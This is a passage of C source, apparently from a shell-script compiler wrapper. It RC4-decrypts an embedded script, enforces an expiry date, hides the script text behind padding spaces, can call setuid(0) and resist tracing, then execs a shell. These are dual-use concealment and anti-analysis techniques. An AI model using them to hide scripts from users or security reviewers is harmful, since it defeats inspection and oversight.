	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }

	ret = chkenv(argc);
	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
#if HARDENING
	    arc4_hardrun(text, text_z);
	    exit(0);
       /* Seccomp Sandboxing - Start */
       seccomp_hardening();
#endif
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
#if BUSYBOXON
	varg[j++] = "busybox";
	varg[j++] = "sh";
#else
	varg[j++] = argv[0];		/* My own name at execution */
#endif
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if SETUID
   setuid(0);
#endif
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if HARDENING
	hardening();
#endif
#if !TRACEABLE
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
